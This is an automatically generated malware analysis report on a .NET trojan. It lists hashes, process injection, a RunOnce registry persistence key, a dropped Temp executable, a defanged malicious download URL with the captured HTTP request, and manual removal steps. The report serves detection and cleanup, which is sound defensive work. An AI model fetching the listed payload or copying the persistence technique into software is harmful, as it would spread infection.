Trojan.MSIL.Agent.BRS_cdec5bda17
HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.MSIL.Agent.BRS (B) (Emsisoft), Trojan.MSIL.Agent.BRS (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: cdec5bda17b9b80ba29c74a86545345b
SHA1: 05364849c4f03f11dc8091783edd029655df198c
SHA256: 381447c3ba7bf64f01950dc2eed4284704d37320ee39eda11652495f7f97416f
SSDeep: 24576:hiR3QuhFhvROg teCSUPpfMxHuIgflJwtsTcwHBvCHmSbOAznn42mvK78zxKtSpp:BGD5UJ4c0y0HPODNKwVQsEhccggAYZE
Size: 3000320 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2016-11-07 06:15:33
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
KNKM4Z122F.exe:2836
%original file name%.exe:1072
The Trojan injects its code into the following process(es):
KNKM4Z122F.exe:4024
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1072 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\KNKM4Z122F.exe (25659 bytes)
Registry activity
The process KNKM4Z122F.exe:2836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process KNKM4Z122F.exe:4024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_WBNB9" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\KNKM4Z122F.exe"
The process %original file name%.exe:1072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\wewewe]
"partner" = "idsc"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\cdec5bda17b9b80ba29c74a86545345b_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cdec5bda17b9b80ba29c74a86545345b_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\wewewe]
"Product" = "unknown"
[HKLM\SOFTWARE\Microsoft\Tracing\cdec5bda17b9b80ba29c74a86545345b_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\wewewe]
"channel" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\cdec5bda17b9b80ba29c74a86545345b_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cdec5bda17b9b80ba29c74a86545345b_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\cdec5bda17b9b80ba29c74a86545345b_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\cdec5bda17b9b80ba29c74a86545345b_RASMANCS]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
Dropped PE files
| MD5 | File path |
|---|---|
| 7d0668ef85f8f57bd8342a9d927e2102 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\KNKM4Z122F.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: SFW4E%JQ
Product Name: S
Product Version: 8.7.3.3
Legal Copyright: Copyright (c) 2016
Legal Trademarks:
Original Filename: TikTak.exe
Internal Name: TikTak.exe
File Version: 8.7.3.3
File Description: SFW4E
Comments: S
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 2926092 | 2926592 | 4.16582 | 2322aa8ae00d541b408cd64a6c412726 |
| .rsrc | 2940928 | 72244 | 72704 | 3.40925 | f01aaf595074d5ef86d3558d1ca2695f |
| .reloc | 3014656 | 12 | 512 | 0.070639 | b56fafb086871b9e627924c1592afa53 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://weminternal.com/get/4/remote.exe | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
GET /get/4/remote.exe HTTP/1.1
Host: weminternal.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 22 Nov 2016 13:14:34 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="remote.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
The Trojan connects to the servers at the following location(s):
.ri3J
-yiq.yiw
-yiq.yi
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
KNKM4Z122F.exe:2836
%original file name%.exe:1072
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\KNKM4Z122F.exe (25659 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_WBNB9" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\KNKM4Z122F.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.